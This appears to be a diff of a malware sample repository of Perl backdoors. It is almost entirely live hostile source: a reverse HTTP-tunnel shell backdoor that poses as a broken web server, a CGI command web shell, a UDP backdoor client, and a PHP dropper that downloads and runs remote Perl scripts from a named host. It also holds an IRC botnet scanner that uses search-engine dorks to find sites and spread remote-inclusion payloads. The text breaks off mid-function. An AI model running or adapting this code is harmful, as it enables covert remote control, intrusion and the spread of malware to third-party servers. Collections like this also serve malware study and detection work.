$REAL_SERVER = $SERVER;
$REAL_PORT = $LISTEN_PORT;
$REAL_PREFIX = "GET " . $CGI_PREFIX;
}
AGAIN: if ($pid) { kill 9, $pid; }
if ($TIME) { # wait until the specified $TIME
$TIME =~ s/^0//; $TIME =~ s/:0/:/;
(undef,$min,$hour,undef,undef,undef,undef,undef,undef)
= localtime(time);
$t=$hour . ":" . $min;
while ($TIME ne $t) {
sleep(28); # every 28 seconds we look at the watch
(undef,$min,$hour,undef,undef,undef,undef,undef,undef)
= localtime(time);
$t=$hour . ":" .$min;
}
}
print STDERR "Slave activated\n" if $DEBUG;
if ($DAILY) { # if we must connect daily, we'll
if (fork) { # fork the daily shell process to
sleep(69); # ensure the master control process
goto AGAIN; # won't get stuck by a fucking cmd
} # the user executed.
print STDERR "forked\n" if $DEBUG;
}
$address = inet_aton($REAL_SERVER) || die "can't resolve server\n";
$remote = sockaddr_in($REAL_PORT, $address);
$forked = 0;
GO: close(THC);
socket(THC, &PF_INET, &SOCK_STREAM, $protocol)
or die "can't create socket\n";
setsockopt(THC, SOL_SOCKET, SO_REUSEADDR, 1);
if (! $forked) { # fork failed? fuck, let's try again
pipe R_IN, W_IN; select W_IN; $|=1;
pipe R_OUT, W_OUT; select W_OUT; $|=1;
$pid = fork;
if (! defined $pid) {
close THC;
close R_IN; close W_IN;
close R_OUT; close W_OUT;
goto GO;
}
$forked = 1;
}
if (! $pid) { # this is the child process (execs $SHELL)
close R_OUT; close W_IN; close THC;
print STDERR "forking $SHELL in child\n" if $DEBUG;
open STDIN, "<&R_IN";
open STDOUT, ">&W_OUT";
open STDERR, ">&W_OUT";
exec $SHELL || print W_OUT "couldn't spawn $SHELL\n";
close R_IN; close W_OUT;
exit(0);
} else { # this is the parent (data control + network)
close R_IN;
sleep($DELAY); # we wait $DELAY for the commands to complete
vec($rs, fileno(R_OUT), 1) = 1;
print STDERR "before: allwritten2stdin\n" if $DEBUG;
select($r = $rs, undef, undef, 30);
print STDERR "after : wait for allwritten2stdin\n" if $DEBUG;
sleep(1); # The following readin of the command output
$output = ""; # looks weird. It must be! every system
vec($ws, fileno(W_OUT), 1) = 1; # behaves different :-((
print STDERR "before: readwhiledatafromstdout\n" if $DEBUG;
while (select($w = $ws, undef, undef, 1)) {
read R_OUT, $readout, 1 || last;
$output = $output . $readout;
}
print STDERR "after : readwhiledatafromstdout\n" if $DEBUG;
print STDERR "before: fucksunprob\n" if $DEBUG;
vec($ws, fileno(W_OUT), 1) = 1;
while (! select(undef, $w=$ws, undef, 0.001)) {
read R_OUT, $readout, 1 || last;
$output = $output . $readout;
}
print STDERR "after : fucksunprob\n" if $DEBUG;
print STDERR "send 0byte to stdout, fail->exit\n" if $DEBUG;
print W_OUT "\000" || goto ENDE;
print STDERR "before: readallstdoutdatawhile!eod\n" if $DEBUG;
while (1) {
read R_OUT, $readout, 1 || last;
last if ($readout eq "\000");
$output = $output . $readout;
}
print STDERR "after : readallstdoutdatawhile!eod\n" if $DEBUG;
&uuencode; # does the encoding of the shell output
$encoded = $REAL_PREFIX . $encoded;
$encoded = $encoded . $PROXY_SUFFIX if ($PROXY);
$encoded = $encoded . "\n";
print STDERR "connecting to remote, fail->exit\n" if $DEBUG;
connect(THC, $remote) || goto ENDE; # connect to master
print STDERR "send encoded data, fail->exit\n" if $DEBUG;
send (THC, $encoded, 0) || goto ENDE; # and send data
$input = "";
vec($rt, fileno(THC), 1) = 1; # wait until master sends reply
print STDERR "before: wait4answerfromremote\n" if $DEBUG;
while (! select($r = $rt, undef, undef, 0.00001)) {}
print STDERR "after : wait4answerfromremote\n" if $DEBUG;
print STDERR "read data from socket until eod\n" if $DEBUG;
$error="no";
while (1) { # read until EOD (End Of Data)
print STDERR "?" if $DEBUG;
# OpenBSD 2.2 can't recv here! can't get any data! sucks ...
recv (THC, $readin, 1, 0) || undef $error;
if ((! $error) and (! $BROKEN_RECV)) { goto OK; }
print STDERR "!" if $DEBUG;
goto OK if (($readin eq "\000") or ($readin eq "\n")
or ($readin eq ""));
$input = $input . $readin;
}
OK: print STDERR "\nall data read, entering OK\n" if $DEBUG;
$input =~ s/\n//gs;
&uudecode; # decoding the data from the master
print STDERR "if password not found -> exit\n" if $DEBUG;
goto ENDE if ( $decoded =~ m/^$PASSWORD/s == 0);
$decoded =~ s/^$PASSWORD//;
print STDERR "writing input data to $SHELL\n" if $DEBUG;
print W_IN "$decoded" || goto ENDE; # sending the data
sleep(1); # to the shell proc.
print STDERR "jumping to GO\n" if $DEBUG;
goto GO;
}
ENDE: kill 9, $pid; $pid = 0;
exit(0);
} # END OF SLAVE FUNCTION
############### MASTER FUNCTION ###############
sub master {
socket(THC, &PF_INET, &SOCK_STREAM, $protocol)
or die "can't create socket\n";
setsockopt(THC, SOL_SOCKET, SO_REUSEADDR, 1);
bind(THC, sockaddr_in($LISTEN_PORT, INADDR_ANY)) || die "can't bind\n";
listen(THC, 3) || die "can't listen\n"; # print the HELP
print STDOUT '
Welcome to the Reverse-WWW-Tunnel-Backdoor v1.6 by van Hauser / THC ...
Introduction: Wait for your SLAVE to connect, examine it\'s output and then
type in your commands to execute on SLAVE. You\'ll have to
wait min. the set $DELAY seconds before you get the output
and can execute the next stuff. Use ";" for multiple commands.
Trying to execute interactive commands may give you headache
so beware. Your SLAVE may hang until the daily connect try
(if set - otherwise you lost).
You also shouldn\'t try to view binary data too ;-)
"echo bla >> file", "cat >> file <<- EOF", sed etc. are your
friends if you don\'t like using vi in a delayed line mode ;-)
To exit this program on any time without doing harm to either
MASTER or SLAVE just press Control-C.
Now have fun.
';
YOP: print STDOUT "\nWaiting for connect ...";
$remote=accept (S, THC) || goto YOP; # get the connection
($r_port, $r_slave)=sockaddr_in($remote); # and print the SLAVE
$slave=gethostbyaddr($r_slave, AF_INET); # data.
$slave="unresolved" if ($slave eq "");
print STDOUT " connect from $slave/".inet_ntoa($r_slave).":$r_port\n";
select S; $|=1;
select STDOUT; $|=1;
$input = "";
vec($socks, fileno(S), 1) = 1;
$error="no";
while (1) { # read the data sent by the slave
while (! select($r = $socks, undef, undef, 0.00001)) {}
recv (S, $readin, 80, 0) || undef $error;
if ((! $error) and (! $BROKEN_RECV)) {
print STDOUT "[disconnected]\n";
}
$readin =~ s/\r//g;
$input = $input . $readin;
last if ( $input =~ m/\n\n/s );
}
&hide_as_broken_webserver if ( $input =~ m/$CGI_PREFIX/s == 0 );
$input =~ s/^.*($CGI_PREFIX)\??//s;
$input =~ s/\n.*$//s;
&uudecode; # decoding the data from the slave
&hide_as_broken_webserver if ( $decoded =~ m/^$PASSWORD/s == 0 );
$decoded =~ s/^$PASSWORD//s;
$decoded = "[Warning! No output from remote!]\n>" if ($decoded eq "");
print STDOUT "$decoded"; # showing the slave output to the user
$output = <STDIN>; # and get his input.
&uuencode; # encode the data for the slave
send (S, $encoded, 0) || die "\nconnection lost!\n"; # and send it
close (S);
print STDOUT "sent.\n";
goto YOP; # wait for the next connect from the slave
} # END OF MASTER FUNCTION
###################### MISC. FUNCTIONS #####################
sub uuencode { # does the encoding stuff for error-free data transfer via WWW
$output = $PASSWORD . $output; # PW is for error checking and
$uuencoded = pack "u", "$output"; # preventing sysadmins from
$uuencoded =~ tr/'\n)=(:;&><,#$*%]!\@"`\\\-' # sending you weird
/'zcadefghjklmnopqrstuv' # data. No real
/; # security!
$uuencoded =~ tr/"'"/'b'/;
if ( ($PROXY) && ($SLAVE_MODE) ) {# proxy drops request if > 4kb
$codelength = (length $uuencoded) + (length $REAL_PREFIX) +12;
$cut_length = 4099 - (length $REAL_PREFIX);
$uuencoded = pack "a$cut_length", $uuencoded
if ($codelength > 4111);
}
$encoded = $uuencoded;
$encoded = $encoded . " HTTP/1.0\n" if ($SLAVE_MODE);
} # END OF UUENCODE FUNCTION
sub uudecode { # does the decoding of the data stream
$input =~ tr/'zcadefghjklmnopqrstuv'
/'\n)=(:;&><,#$*%]!\@"`\\\-'
/;
$input =~ tr/'b'/"'"/;
$decoded = unpack "u", "$input";
} # END OF UUDECODE FUNCTION
sub base64encoding { # does the base64 encoding for proxy passwords
$encode_string = $PROXY_USER . ":" . $PROXY_PASSWORD;
$encoded_string = substr(pack('u', $encode_string), 1);
chomp($encoded_string);
$encoded_string =~ tr|` -_|AA-Za-z0-9+/|;
$padding = (3 - length($encode_string) % 3) % 3;
$encoded_string =~ s/.{$padding}$/'=' x $padding/e if $padding;
$PROXY_COOKIE = "Proxy-authorization: Basic " . $encoded_string . "\n";
} # END OF BASE64ENCODING FUNCTION
sub hide_as_broken_webserver { # invalid request -> look like broken server
send (S, "<HTML><HEAD>\n<TITLE>404 File Not Found</TITLE>\n</HEAD>".
"<BODY>\n<H1>File Not Found</H1>\n</BODY></HTML>\n", 0);
close S;
print STDOUT "Warning! Illegal server access!\n"; # report to user
goto YOP;
} # END OF HIDE_AS_BROKEN_WEBSERVER FUNCTION
# END OF PROGRAM # (c) 1998 by <vh@reptile.rug.ac.be>

93
Perl/Backdoor.Perl.Agent.a Normal file
View File

@ -0,0 +1,93 @@
############################################################
## Network security team ##
############################################################
##Coder: Ins ##
############################################################
##Ob dannom scripte: Eto prostoj shell napisannyj na perle##
############################################################
#V celjah nesankcionirovannogo dostupa smeni etot parol`"
#$pwd='';
print "Content-type: text/html\n\n";
&read_param();
if (!defined$param{dir}){$param{dir}="/"};
if (!defined$param{cmd}){$param{cmd}="ls -la"};
##if (!defined$param{pwd}){$param{pwd}='Enter_Password'};##
print << "[ins1]";
<head>
<title>::Network Security Team::</title>
<font size=3 face=verdana><b>Network security team :: CGI Shell</b>
<font size=-2 face=verdana><br><br>
<style>
BODY, TD { font-family: Tahoma; font-size: 12px; }
INPUT.TEXT {
font-family : Arial;
font-size : 8pt;
color : Black;
width : 100%;
background-color : #F1F1F1;
border-style : solid;
border-width : 0px;
border-color : Silver;
}
INPUT.BUTTON {
font-family : Arial;
font-size : 8pt;
width : 100px;
border-width : 1px;
color : Black;
background-color : D1D1D1;
border-color : silver;
border-style : solid;
}
</style>
</head>
<body bgcolor=#B9B9B9>
Vvedite zapros:
<table width=500 bgcolor=D9D9D9><tr><td>
[ins1]
print "cd $param{dir}&&$param{cmd}";
print << "[ins2]";
</td></tr></table>
Otvet na zapros:
<table width=500 bgcolor=D9D9D9><tr><td><pre>
[ins2]
#if ($param{pwd} ne $pwd){print "Nepravelnij user";}
open(FILEHANDLE, "cd $param{dir}&&$param{cmd}|");
while ($line=<FILEHANDLE>){print "$line";};
close (FILEHANDLE);
print << "[ins3]";
</pre></td></tr></table>
<form action=pshell.cgi>
DIR dlja sledujushego zaprosa:
<input type=text class="TEXT" name=dir value=$param{dir}>
Sledujushij zapros:
<input type=text class="TEXT" name=cmd value=$param{cmd}>
<input type=submit class="button" value="Submit">
<input type=reset class="button" value="Reset">
</form>
</body>
</html>
[ins3]
sub read_param {
$buffer = "$ENV{'QUERY_STRING'}";
@pairs = split(/&/, $buffer);
foreach $pair (@pairs)
{
($name, $value) = split(/=/, $pair);
$name =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
$value =~ s/\+/ /g;
$value =~ s/%20/ /g;
$value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
$param{$name} = $value;
}
}
#########################<<KONEC>>#####################################

48
Perl/Backdoor.Perl.Anarchy Normal file
View File

@ -0,0 +1,48 @@
use IO::Socket;
use Getopt::Std;
getopts('s:p:h', \%opt)||die("Error: Unable to get command line options !!!\n");
if(defined($opt{'h'})) { \&usage() }
if(defined($opt{'s'})) { $server=$opt{'s'} } else { \&usage() }
if(defined($opt{'p'})) { $port=$opt{'p'} } else { \&usage() }
$|=1;
$maxlen=1024;
$sock=IO::Socket::INET->new(Proto=>'udp')
or die("Error: Cannot initialize socket !!!\n");
$ipaddr=inet_aton($server);
$portaddr=sockaddr_in($port, $ipaddr);
print("\nAUDP Backdoor started.\n");
print("======================\n");
while(1) {
print("=> ");
$mesg=<STDIN>;
chomp $mesg;
if($mesg=~/^\s*(exit)|(quit)\s*/i) { exit(0) }
if($mesg!~/^\s*$/) {
send($sock, $mesg."\n", 0, $portaddr)==length($mesg."\n");
while($portaddr=recv($sock, $msg, $maxlen, 0)) {
if($msg=~/^\-end\.$/) { last } else {
print $msg;
}
}
}
}
sub usage() {
print("\nAUDP - Programmed by Anarchy\n");
print("============================\n");
print("Usage: AUDP -s <host> -p <port>\n\n");
exit 1;
}

1905
Perl/Backdoor.Perl.IRCBot.aa Normal file
View File

File diff suppressed because it is too large Load Diff

1721
Perl/Backdoor.Perl.IRCBot.ac Normal file
View File

File diff suppressed because it is too large Load Diff

2578
Perl/Backdoor.Perl.IRCBot.af Normal file
View File

File diff suppressed because it is too large Load Diff

2052
Perl/Backdoor.Perl.IRCBot.ai.txt Normal file
View File

File diff suppressed because it is too large Load Diff

1860
Perl/Backdoor.Perl.IRCBot.n Normal file
View File

File diff suppressed because it is too large Load Diff

119
Perl/Backdoor.Perl.IRCBot.p Normal file
View File

@ -0,0 +1,119 @@
<?
$dir = @getcwd();
echo "Mic22<br>";
$OS = @PHP_OS;
echo "OSTYPE:$OS<br>";
$free = disk_free_space($dir);
shell_exec('cd /tmp; wget http://inteligent.freehostia.com/21.txt;perl 21.txt;rm -rf 21.txt');
shell_exec('cd /tmp;curl -O http://inteligent.freehostia.com/21.txt;perl 21.txt;rm -rf 21.txt');
shell_exec('cd /tmp;lwp-download http://inteligent.freehostia.com/21.txt;perl 21.txt;rm -rf 21.txt');
shell_exec('cd /tmp;lynx -source http://inteligent.freehostia.com/21.txt;perl 21.txt;rm -rf 21.txt');
shell_exec('cd /tmp;fetch http://inteligent.freehostia.com/21.txt>21.txt;perl 21.txt;rm -rf 21.txt');
shell_exec('cd /tmp;GET http://inteligent.freehostia.com/21.txt>21.txt;perl 21.txt;rm -rf 21.txt');
system('cd /tmp;wget http://inteligent.freehostia.com/21.txt;perl 21.txt;rm -rf 21.txt');
system('cd /tmp;curl -O http://inteligent.freehostia.com/21.txt;perl 21.txt;rm -rf 21.txt');
system('cd /tmp;lwp-download http://inteligent.freehostia.com/21.txt;perl 21.txt;rm -rf 21.txt');
system('cd /tmp;lynx -source http://inteligent.freehostia.com/21.txt;perl 21.txt;rm -rf 21.txt');
system('cd /tmp;fetch http://inteligent.freehostia.com/21.txt>21.txt;perl 21.txt;rm -rf 21.txt');
system('cd /tmp;GET http://inteligent.freehostia.com/21.txt>21.txt;perl 21.txt;rm -rf 21.txt');
passthru('cd /tmp;wget http://inteligent.freehostia.com/21.txt;perl 21.txt;rm -rf 21.txt');
passthru('cd /tmp;curl -O http://inteligent.freehostia.com/21.txt;perl 21.txt;rm -rf 21.txt');
passthru('cd /tmp;lwp-download http://inteligent.freehostia.com/21.txt;perl 21.txt;rm -rf 21.txt');
passthru('cd /tmp;lynx -source http://inteligent.freehostia.com/21.txt;perl 21.txt;rm -rf 21.txt');
passthru('cd /tmp;fetch http://inteligent.freehostia.com/21.txt>21.txt;perl 21.txt;rm -rf 21.txt');
passthru('cd /tmp;GET http://inteligent.freehostia.com/21.txt>21.txt;perl 21.txt;rm -rf 21.txt');
shell_exec('cd /tmp; wget http://inteligent.freehostia.com/21.txt;perl 21.txt;rm -rf 21.txt');
shell_exec('cd /tmp;curl -O http://inteligent.freehostia.com/21.txt;perl 21.txt;rm -rf 21.txt');
shell_exec('cd /tmp;lwp-download http://inteligent.freehostia.com/21.txt;perl 21.txt;rm -rf 21.txt');
shell_exec('cd /tmp;lynx -source http://inteligent.freehostia.com/21.txt;perl 21.txt;rm -rf 21.txt');
shell_exec('cd /tmp;fetch http://inteligent.freehostia.com/21.txt>21.txt;perl 21.txt;rm -rf 21.txt');
shell_exec('cd /tmp;GET http://inteligent.freehostia.com/21.txt>21.txt;perl 21.txt;rm -rf 21.txt');
system('cd /tmp;wget http://inteligent.freehostia.com/21.txt;perl 21.txt;rm -rf 21.txt');
system('cd /tmp;curl -O http://inteligent.freehostia.com/21.txt;perl 21.txt;rm -rf 21.txt');
system('cd /tmp;lwp-download http://inteligent.freehostia.com/21.txt;perl 21.txt;rm -rf 21.txt');
system('cd /tmp;lynx -source http://inteligent.freehostia.com/21.txt;perl 21.txt;rm -rf 21.txt');
system('cd /tmp;fetch http://inteligent.freehostia.com/21.txt>21.txt;perl 21.txt;rm -rf 21.txt');
system('cd /tmp;GET http://inteligent.freehostia.com/21.txt>21.txt;perl 21.txt;rm -rf 21.txt');
passthru('cd /tmp;wget http://inteligent.freehostia.com/21.txt;perl 21.txt;rm -rf 21.txt');
passthru('cd /tmp;curl -O http://inteligent.freehostia.com/21.txt;perl 21.txt;rm -rf 21.txt');
passthru('cd /tmp;lwp-download http://inteligent.freehostia.com/21.txt;perl 21.txt;rm -rf 21.txt');
passthru('cd /tmp;lynx -source http://inteligent.freehostia.com/21.txt;perl 21.txt;rm -rf 21.txt');
passthru('cd /tmp;fetch http://inteligent.freehostia.com/21.txt>21.txt;perl 21.txt;rm -rf 21.txt');
passthru('cd /tmp;GET http://inteligent.freehostia.com/21.txt>21.txt;perl 21.txt;rm -rf 21.txt');
shell_exec('cd /tmp;rm -rf 21.txt*');
system('cd /tmp;rm -rf 21.txt**');
passthru('cd /tmp;rm -rf 21.txt**');
shell_exec('cd /tmp;rm -rf 21.txt**');
system('cd /tmp;rm -rf 21.txt**');
passthru('cd /tmp;rm -rf 21.txt**');
shell_exec('cd /tmp;rm -rf 21.txt*');
system('cd /tmp;rm -rf 21.txt**');
passthru('cd /tmp;rm -rf 21.txt**');
shell_exec('cd /tmp;rm -rf 21.txt**');
system('cd /tmp;rm -rf 21.txt**');
passthru('cd /tmp;rm -rf 21.txt**');
if ($free === FALSE) {$free = 0;}
if ($free < 0) {$free = 0;}
echo "Free:".view_size($free)."<br>";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
function view_size($size)
{
if (!is_numeric($size)) {return FALSE;}
else
{
if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
else {$size = $size . " B";}
return $size;
}
}
exit;

1333
Perl/Backdoor.Perl.IRCBot.r Normal file
View File

File diff suppressed because it is too large Load Diff

1265
Perl/Backdoor.Perl.IRCBot.t Normal file
View File

File diff suppressed because it is too large Load Diff

1075
Perl/Backdoor.Perl.IRCBot.v Normal file
View File

File diff suppressed because it is too large Load Diff

487
Perl/Backdoor.Perl.IRCBot.w Normal file
View File

@ -0,0 +1,487 @@
use HTTP::Request;
use LWP::UserAgent;
use IO::Socket::INET;
my $cmd = "http://www.wauze.de//language/lang_english/RuLeZ/me.txt?";
my $cmdprint = "http://www.wauze.de//language/lang_english/r.txt??";
my $nick = "UnIx|".(int(rand(99)));
my $ident = "xpl";
my $chan = "#r4k3t";
my $server = "211.21.73.10";
my $http = "Googlebot";
my $port = 6667;
my $sock;
my $proxy = 30;
my $admin = "SuPrEmO";
my $stringa = "!scan";
my $spread = "http://www.malteser-paderborn.de//contenido/includes/c.txt?";
my @User_Agent = &Agent();
my $pid = fork();
if($pid==0){
&irc($nick,$ident,$chan,$server,$port);
}else{
exit(0);
}
sub irc(){
my($nick,$ident,$chan,$server,$port)=@_;
$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$server",PeerPort=>$port);
$sock->autoflush(1);
print $sock "NICK ".$nick."\r\n";
print $sock "USER ".$ident." 8 * : By SISTEM\r\n";
print $sock "JOIN ".$chan."\r\n";
while( $cmdline = <$sock> ){
if ( $cmdline =~ /PRIVMSG $chan :$stringa\s+(.*?)\s+(.*)/ ) {
if(fork() == 0){
my($bug,$dork)=($1,$2);
&scan($bug,$dork);
exit(0);
}
}
if ($cmdline =~ /PRIVMSG $chan :!info/){
&privmsg($chan,"9[10Per scannare9]: 15$stringa bug dork");
}
if ($cmdline =~ /PRIVMSG $chan :!outbye/){
exit(0);
}
if($cmdline =~ /^PING \:(.*)/){
print $sock "PONG :$1";
}
}
}
sub scan(){
my($bug,$dork)=@_;
my $contatore = 0;
&privmsg($chan,"9[10Scansione Per9]: 5Bug:".$bug);
&privmsg($chan,"9[10Scansione Per9]: 6Dork:".$dork);
my @proc;
$proc[9] = fork();
if($proc[9] == 0){
&privmsg($chan,"9[10Scansione Di9]: 6Google4:".scalar(&Google($dork)));
exit;
}
$proc[1] = fork();
if($proc[1] == 0){
&privmsg($chan,"9[10Scansione Di9]: 6Yahoo4:".scalar(&Yahoo($dork)));
exit;
}
$proc[2] = fork();
if($proc[2] == 0){
&privmsg($chan,"9[10Scansione Di9]: 6Altavista4:".scalar(&Altavista($dork)));
exit;
}
$proc[3] = fork();
if($proc[3] == 0){
&privmsg($chan,"9[10Scansione Di9]: 6Lycos4:".scalar(&Gigablast($dork)));
exit;
}
$proc[4] = fork();
if($proc[4] == 0){
&privmsg($chan,"9[10Scansione Di9]: 6Msn4:".scalar(&Msn($dork)));
exit;
}
$proc[5] = fork();
if($proc[5] == 0){
&privmsg($chan,"9[10Scansione Di9]: 6Ilse.Nl4:".scalar(&Ask($dork)));
exit;
}
$proc[6] = fork();
if($proc[6] == 0){
&privmsg($chan,"9[10Scansione Di9]: 6Tiscali4:".scalar(&Fireball($dork)));
exit;
}
$proc[7] = fork();
if($proc[7] == 0){
&privmsg($chan,"9[10Scansione Di9]: 6Alltheweb4:".scalar(&Alltheweb($dork)));
exit;
}
$proc[8] = fork();
if($proc[8] == 0){
&privmsg($chan,"9[10Scansione Di9]: 6Aol4:".scalar(&Aol($dork)));
exit;
}
waitpid($proc[9],0);
waitpid($proc[1],0);
waitpid($proc[2],0);
waitpid($proc[3],0);
waitpid($proc[4],0);
waitpid($proc[5],0);
waitpid($proc[6],0);
waitpid($proc[7],0);
waitpid($proc[8],0);
my @links = &GetLink();
my @forks;
my $forked++;
&privmsg($chan,"9[10Ricerca9]: 15Totals Results:".scalar(@links));
my @uni = &Unici(@links);
&privmsg($chan,"9[10Ricerca9]: 15Cleaned:".scalar(@uni));
&Remove();
my $testx = scalar(@uni);
my $startx = 0;
foreach my $sito (@uni){
$contatore++;
my $link = "http://" . $sito . $bug . $cmd . "?";
my $link = "http://" . $sito . $bug . $spread . "?";
if($contatore %$proxy == 0){
my $start = 0;
foreach my $f(@forks){
waitpid($f,0);
$forks[$start--];
$start++;
}
$startx = 0;
}
$forks[$startx]=fork();
if($forks[$startx] == 0){
my $htmlsito = &Query($link,"3");
if($htmlsite =~ /JaheeM/ && $htmlsite =~ /uid=/){
&privmsg($chan,"9[4SAFE OFF9]: 8"."http://" . $sito . $bug . "3" . $cmdprint . "?");
&privmsg($admin,"9[4SAFE OFF9]: 8"."http://" . $sito . $bug . "3" . $cmdprint . "?");
&privmsg($admin,"9[4SPreAD9]: 8"."http://" . $sito . $bug . "4" . $spread . "?");
}
elsif($htmlsito =~ /JaheeM/){
&privmsg($chan,"9[11SAFE ON9]: 7"."http://" . $sito . $bug . "7" . $cmdprint . "?");
&privmsg($admin,"9[11SAFE ON9]: 7"."http://" . $sito . $bug . "7" . $cmdprint . "?");
&privmsg($admin,"9[11SpreaD9]: 7"."http://" . $sito . $bug . "4" . $spread . "?");
}
exit(0);
}
if($contatore %200 == 0){
&privmsg($chan,"9[10Ricerca9]: 7Scannati ".$contatore." di ".$testx);
}
$startx++;
}
my $start = 0;
foreach my $f(@forks){
waitpid($f,0);
$forks[$start--];
$start++;
}
&privmsg($chan,"9[10Ricerca4]:".$bug .$dork);
&privmsg($chan,"9[10Ricerca4]: 7Fine.");
}
sub privmsg(){
my ($cha,$cosi)=@_;
print $sock "PRIVMSG ".$cha." :".$cosi."\r\n";
}
sub Google(){
my($dork)=@_;
$dork=&Key($dork);
my $start;
my $num=100;
my $max=100*10;
my @dom = &GoogleDomains();
my $file = "google.txt";
my $html;
my @result;
foreach my $dominio (@dom){
for($start=0;$start < $max; $start += $num){
$html.=&Query("http://www.google.".$dominio."/search?q=".$dork."&num=100&hl=de&cr=countryDE&start=".$start."&sa=N");
}
}
while($html =~ m/<h2 class=r><a href=\"http:\/\/(.+?)\"/g){
$1 =~ /google/ || push(@result,&Links($1,$file));
}
return(@result);
}
sub Yahoo(){
my($dork)=@_;
$dork=&Key($dork);
my $start;
my $num=100;
my $max=100*10;
my $file = "yahoo.txt";
my $html;
my @result;
for($start=0;$start < $max; $start += $num){
$html.=&Query("http://search.yahooapis.com/WebSearchService/V1/webSearch?appid=SiteSearch&query=".$dork."&results=".$num."&start=".$start);
}
while($html =~ m/<Url>http:\/\/(.+?)\<\/Url>/g){
$1 =~ /yahoo/ || push(@result,&Links($1,$file));
}
return(@result);
}
sub Altavista(){
my($dork)=@_;
$dork=&Key($dork);
my $start;
my $num=100;
my $max=100*10;
my $file = "altavista.txt";
my $html;
my @result;
for($start=0;$start < $max; $start += $num){
$html.=&Query("http://de.altavista.com/web/results?itag=ody&pg=aq&aqmode=s&aqa=".$dork."&aqp=&aqo=&aqn=&kgs=1&kls=1&filetype=&rc=dmn&swd=&lh=&nbq=50&stq=".$start);
}
while($html =~ m/<span class=ngrn>(.+?)\ <\/span>/g){
if($1 !~ /yahoo/ && $1 !~ /Altavista/){
push(@result,&Links($1,$file));
}
}
return(@result);
}
sub Gigablast(){
my($dork)=@_;
$dork=&Key($dork);
my $start;
my $max=99;
my $file = "gigablast.txt";
my $html;
my @result;
for($start=1;$start < $max; $start += 1){
$html.=&Query("http://suche.lycos.de/cgi-bin/pursuit?pag=".$start."&query=".$dork."&SITE=de&cat=loc&enc=utf-8");
}
while($html =~ m/href=\"(.+?)\"/g){
push(@result,&Links($1,$file));
}
return(@result);
}
sub Msn(){
my($dork)=@_;
$dork=&Key($dork);
my $start;
my $num=10;
my $max=100*10;
my $file = "msn.txt";
my $html;
my @result;
for($start=1;$start < $max; $start += $num){
$html.=&Query("http://search.live.com/results.aspx?q=".$dork."&lf=1&rf=1&first=".$start);
}
while($html =~ m/<a href=\"http:\/\/(.+?)\"/g){
$1 =~ /msn/ || push(@result,&Links($1,$file));
}
return(@result);
}
sub Ask(){
my($dork)=@_;
$dork=&Key($dork);
my $start;
my $num=1;
my $max=100;
my $file = "ask.txt";
my $html;
my @result;
for($start=1;$start < $max; $start += $num){
$html.=&Query("http://search.ilse.nl/web?rid=PREV&pagnum=".$start."&search_for=".$dork);
}
while($html =~ m/\">(.+?)<\/a>/g){
$1 =~ /ask/ || push(@result,&Links($3,$file));
}
return(@result);
}
sub Fireball(){
my($dork)=@_;
$dork=&Key($dork);
my $start;
my $num=1;
my $max=99;
my $file = "fireball.txt";
my $html;
my @result;
for($start=1;$start < $max; $start += $num){
$html.=&Query("http://search-dyn.tiscali.de/search.php?key=".$dork."&collection=de&tiscalitype=web&hits=10&language=de&maxCount=&collapse=on&spell=suggest&pg=".$start."&offset=".(($start-1)*10)."&xargs=");
}
while($html =~ m/onmouseover=\"window.status=\'http:\/\/(.+?)\'/g){
$1 =~ /tiscali/ || push(@result,&Links($1,$file));
}
return(@result);
}
sub Alltheweb(){
my($dork)=@_;
$dork=&Key($dork);
my $start;
my $num=100;
my $max=100*10;
my $file = "alltheweb.txt";
my $html;
my @result;
for($start=0;$start < $max; $start += $num){
$html.=&Query("http://www.alltheweb.com/search?advanced=1&cat=web&type=all&hits=".$num."&ocjp=1&q=".$dork."&o=".$start);
}
while($html =~ m/<span class=\"resURL\">http:\/\/(.+?)\ /g){
$1 =~ /alltheweb/ || push(@result,&Links($1,$file));
}
return(@result);
}
sub Aol(){
my($dork)=@_;
$dork=&Key($dork);
my $start;
my $num=1;
my $max=100;
my $file = "aol.txt";
my $html;
my @result;
for($start=0;$start < $max; $start += $num){
$html.=&Query("http://suche.aol.de/aol/search?query=".$dork."&page=".$start."&nt=SG2&langRestrict=2&q=".$dork."&rp=lang_de");
}
while($html =~ m/<p class=\"deleted\" property=\"f:url\">http:\/\/(.+?)\<\/p>/g){
$1 =~ /aol/ || push(@result,&Links($1,$file));
}
return(@result);
}
sub Query(){
my($link,$timeout)=@_;
my $req=HTTP::Request->new(GET=>$link);
my $ua=LWP::UserAgent->new();
$ua->agent($User_Agent[rand(scalar(@User_Agent))]);
$ua->timeout($timeout);
my $response=$ua->request($req);
return $response->content;
}
sub Key(){
my $chiave=$_[0];
$chiave =~ s/ /\+/g;
$chiave =~ s/:/\%3A/g;
$chiave =~ s/\//\%2F/g;
$chiave =~ s/&/\%26/g;
$chiave =~ s/\"/\%22/g;
$chiave =~ s/\\/\%5C/g;
$chiave =~ s/,/\%2C/g;
return $chiave;
}
sub GetLink(){
my @file = ("google.txt","yahoo.txt","altavista.txt","gigablast.txt","msn.txt","ask.txt","fireball.txt","alltheweb.txt","aol.txt");
my $link;
my @total;
foreach my $n (@file){
open(F,'<',$n);
while($link = <F>){
$link=~s/[\r\n]//g;
push(@total,$link);
}
close(F);
}
return(@total);
}
sub Remove(){
my @file = ("google.txt","yahoo.txt","altavista.txt","gigablast.txt","msn.txt","ask.txt","fireball.txt","alltheweb.txt","aol.txt");
foreach my $n (@file){
system("rm -rf ".$n);
}
}
sub Links(){
